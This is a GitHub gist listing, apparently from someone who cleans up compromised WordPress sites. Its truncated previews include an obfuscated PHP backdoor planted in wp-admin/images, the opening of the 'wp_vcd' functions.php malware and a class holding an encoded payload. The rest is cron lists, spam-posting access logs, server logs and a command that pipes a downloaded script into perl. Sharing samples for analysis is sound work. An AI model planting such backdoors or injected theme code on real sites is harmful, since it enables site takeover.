Salvador Aguilar malwador
⚔️
malwador
/ gist:3079a3d4378a662f10c4e002d67e50e5
Created
July 20, 2019 01:52
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .wpb-js-composer .vc_tta.vc_general .vc_tta-panel-title>a:focus,.wpb-js-composer .vc_tta.vc_general .vc_tta-panel-title>a:hover,.wpb-js-composer .vc_tta.vc_general .vc_tta-tab>a:focus,.wpb-js-composer .vc_tta.vc_general .vc_tta-tab>a:hover{outline:0;text-decoration:none;box-shadow:none}.wpb-js-composer .vc_tta-container{margin-bottom:21.74px}.wpb-js-composer .vc_tta.vc_general{font-size:1em}.wpb-js-composer .vc_tta.vc_general .vc_tta-panels,.wpb-js-composer .vc_tta.vc_general .vc_tta-panels-container{box-sizing:border-box;position:relative}.wpb-js-composer .vc_tta.vc_general .vc_tta-panel{display:block}.wpb-js-composer .vc_tta.vc_general .vc_tta-panel-heading{border:solid transparent;box-sizing:border-box;-webkit-transition:background .2s ease-in-out;transition:background .2s ease-in-out}.wpb-js-composer .vc_tta.vc_general .vc_tta-panel-title{margin:0;line-height:1}.wpb-js-composer .vc_tta.vc_general .vc_tta-panel-title>a{background:0 0;display:block;padding:14px 20px;box-sizing:border-box;text-decoration:non |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| class Rst { const PLATFORM_UNKNOWN = 0; const PLATFORM_ANDROID = 1; const PLATFORM_APPLE = 2; const PLATFORM_LINUX = 3; const PLATFORM_WINDOWS = 4; private $contentData = '7P13XFNZFzeOnuQEEmpQQbAziqJiQUEDghJKAkhJFMFCsSNipwhKCzkJJDlEwF5Hx9HRsXdQEUINSBc7FqyAoKIgLck5d0V83vd55nl+n3vvH/e/y2e2J+e719577bXXXuW08VuWhaAIgtCgkCSC5CIDf2zk//1fExTjMXeMkRt61b/lUnyrf1sUsT7acmvUlnVRKzdZrl65efOWGMtVay2jYjdbrt9s6cELsNy0Zc3aaUZG+la/+hgU+ulwoLOo4l8lqp+sWPjzt7jiCxx9NtMrFv2qW/zz3OTnuc9ms5/HhetXR2jr/p945HMQxJdCQ0JWXQ35v3yjFAOKHoJYUhDk/gBmOwV+m2h/UAZmr/1NRRCdX23+dURMqD+FtaCVqq0W/CQ0+Vnx6/h/DgNjzaYgfO2PFRTE8sK/VbRTEAej/w+E/P/0B3z2Uv+fq6fFrI2PgaNmzK95aedK+08aS+BqWtSalTErEYQYOtAnYgFHK8p/0LHhv2kDZIiDdkw+5adsEOf/olNMi4qOWq3tWztXmDNyCY7z/ru//6/m+v//+//ZXwh7d237/YRfZzujK6c6TukbOCEMzcWE+n+0ufj0Rn/V449jg7bk6hcMih/5dDT+Ew+edca95H/Qu8eujvfJvvLF/M0rz98fXqc3n9j/b7WFNp+sb0w5PI8l//E/2o4zu1cU4b7zM5lkiltG/jHpxtHE/6Ixijrw+yPnwa88/jC8vX/e7bX3kBv/3VGA6YFJDy7cf03nHPxUkiORPW7/B8HR2ZwrI0WOKS1X2Lplqq9a6O/Raxr+q6Py90O2+hev6fxd5INsd5OO+m8K+HNoOD/c/OqroH |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| +------------------------------------------------------------------------------+---------------------+--------------------+---------------+ | |
| | hook | next_run_gmt | next_run_relative | recurrence | | |
| +------------------------------------------------------------------------------+---------------------+--------------------+---------------+ | |
| | wp_privacy_delete_old_export_files | 2019-04-11 16:26:20 | now | 1 hour | | |
| | action_scheduler_run_queue | 2019-04-11 16:26:25 | now | 1 minute | | |
| | start_scheduled_trigger_cron | 2019-04-11 16:26:48 | now | Non-repeating | | |
| | crm_email_crawler | 2019-04-11 16:27:02 | now | 1 minute | | |
| | rsssl_pro_daily_hook |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .++++++++++++++++++++++++++++#####+++++++++++++++++++++++++++++++++++++++++++####+++++++++++++++++++++++++++++++++++++++++++######+++++++++++++++++++++++++++++++++++++++++########+++++++++++++++++++++ | |
| +++++++++++++++++++++++++++++######++++++++++++++++++++++++++++++++++++++++++###+++++++++++++++++++++++++++++++++++++++++++########+++++++++++++++++++++++++++++++++++++++++#######+++++++++++++++++++++ | |
| +++++++++++++++++++++++++++++######++++++++++++++++++++++++++++++++++++++++++##+++++++++++++++++++++++++++++++++++++++++++++######+++++++++++++++++++++++++++++++++++++++++#######++++++++++++++++++++++ | |
| +++++++++++++++++++++++++++++######+++++++++++++++++++++++++++++++++++++++++++##++++++++++++++++++++++++++++++++++++++++++++#######++++++++++++++++++++++++++++++++++++++++########+++++++++++++++++++++ | |
| +++++++++++++++++++++++++++++#####+++++++++++++++++++++++++++++++++++++++++++++#+++++++++++++++++++++++++++++++++++++++++++#######+++++++++++++++++++++++++++++++++++++++++#######++++++++++++++++++++++ | |
| +++++++++++++++++++ |
malwador
/ pdptckre.php
Last active
October 12, 2018 19:55
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wp-admin/images/pdptckre.php | |
| <?php | |
| $ocivvt = 'Hi-x*4\'yt63m8fa#sk02nrpgbe_o7d5ulvc';$ohglloc = Array();$ohglloc[] = $ocivvt[10].$ocivvt[30].$ocivvt[29].$ocivvt[30].$ocivvt[28].$ocivvt[34].$ocivvt[12].$ocivvt[34].$ocivvt[2].$ocivvt[25].$ocivvt[18].$ocivvt[25].$ocivvt[18].$ocivvt[2].$ocivvt[5].$ocivvt[18].$ocivvt[18].$ocivvt[9].$ocivvt[2].$ocivvt[24].$ocivvt[19].$ocivvt[13].$ocivvt[18].$ocivvt[2].$ocivvt[29].$ocivvt[28].$ocivvt[30].$ocivvt[12].$ocivvt[14].$ocivvt[12].$ocivvt[34].$ocivvt[10].$ocivvt[29].$ocivvt[30].$ocivvt[25].$ocivvt[28];$ohglloc[] = $ocivvt[0].$ocivvt[4];$ohglloc[] = $ocivvt[15];$ohglloc[] = $ocivvt[34].$ocivvt[27].$ocivvt[31].$ocivvt[20].$ocivvt[8];$ohglloc[] = $ocivvt[16].$ocivvt[8].$ocivvt[21].$ocivvt[26].$ocivvt[21].$ocivvt[25].$ocivvt[22].$ocivvt[25].$ocivvt[14].$ocivvt[8];$ohglloc[] = $ocivvt[25].$ocivvt[3].$ocivvt[22].$ocivvt[32].$ocivvt[27].$ocivvt[29].$ocivvt[25];$ohglloc[] = $ocivvt[16].$ocivvt[31].$ocivvt[24].$ocivvt[16].$ocivvt[8].$ocivvt[21];$ohglloc[] = $ocivvt[14].$ocivvt[21].$ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| www.gizmoids.com 179.61.232.209 [08/Sep/2018:12:09:44 +0000] POST "/forums/board/companies-and-business/" HTTP/1.0 302 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0" "-" 179.61.232.209 1 1 "/" "index" php "" 0 - 0 403 1.383 1.385 | |
| www.gizmoids.com 179.61.232.209 [08/Sep/2018:12:09:45 +0000] POST "/forums/topic/cheap-prazosin-for-sale-online-no-prescription-required-buy/" HTTP/1.0 200 "https://www.gizmoids.com/forums/board/companies-and-business/" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0" "-" 179.61.232.209 1 1 "/" "index" php "" 0 - 46287 46678 0.144 0.144 | |
| www.gizmoids.com 179.61.232.209 [08/Sep/2018:12:10:25 +0000] POST "/forums/board/companies-and-business/" HTTP/1.0 302 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0" "-" 179.61.232.209 1 1 "/" "index" php "" 0 - 0 407 1.428 1.428 | |
| www.gizmoids.com 179.61.232.209 [08/Sep/2018:12:10:26 +0000] POST "/forums/topic/mail-order-digitalis-legitimate-buy-digitalis-and-c |
malwador
/ mysqltuner.pl output
Last active
July 5, 2018 16:32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@KpF-honestbrew:~# curl -s https://raw.githubusercontent.com/major/MySQLTuner-perl/master/mysqltuner.pl | perl | |
| >> MySQLTuner 1.7.9 - Major Hayden <[email protected]> | |
| >> Bug reports, feature requests, and downloads at http://mysqltuner.com/ | |
| >> Run with '--help' for additional options and output filtering | |
| [--] Skipped version check for MySQLTuner script | |
| [OK] Logged in using credentials from debian maintenance account. | |
| [OK] Currently running supported MySQL version 10.1.32-MariaDB-1~xenial | |
| [OK] Operating on 64-bit architecture |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Jul 5 07:34:39 KpF-honestbrew mysqld[109088]: 2018-07-05 7:34:39 139851464473344 [Warning] Aborted connection 6819 to db: 'honestbrew' user: 'honestbrew' host: 'localhost' (Got timeout reading communication packets) | |
| Jul 5 07:47:38 KpF-honestbrew mysqld[109088]: 2018-07-05 7:47:38 139851480406784 [Warning] Aborted connection 7478 to db: 'honestbrew' user: 'honestbrew' host: 'localhost' (Got timeout reading communication packets) | |
| Jul 5 09:50:46 KpF-honestbrew mysqld[109088]: 2018-07-05 9:50:46 139851533413120 [Warning] Aborted connection 16249 to db: 'honestbrew' user: 'honestbrew' host: 'localhost' (Got timeout reading communication packets) | |
| Jul 5 10:07:27 KpF-honestbrew mysqld[109088]: 2018-07-05 10:07:27 139851533413120 [Warning] Aborted connection 17923 to db: 'honestbrew' user: 'honestbrew' host: 'localhost' (Got timeout reading communication packets) | |
| Jul 5 10:08:53 KpF-honestbrew mysqld[109088]: 2018-07-05 10:08:53 139851480709888 [Warning] Aborted connection 18135 to db: 'honestbrew' user: 'hones |
malwador
/ gist:30bfbea72227549b9f2834f0d95c39e2
Created
June 15, 2018 02:48
Para Alejandro Rodriguez
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 999 gracias | |
| 998 gracias | |
| 997 gracias | |
| 996 gracias | |
| 995 gracias | |
| 994 gracias | |
| 993 gracias | |
| 992 gracias | |
| 991 gracias | |
| 990 gracias |
malwador
/ functions.php
Created
April 6, 2018 21:37
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $div_code_name = "wp_vcd"; | |
| $funcfile = __FILE__; | |
| if(!function_exists('theme_temp_setup')) { | |
| $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI]; | |
| if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { | |
| function file_get_contents_tcurl($url) |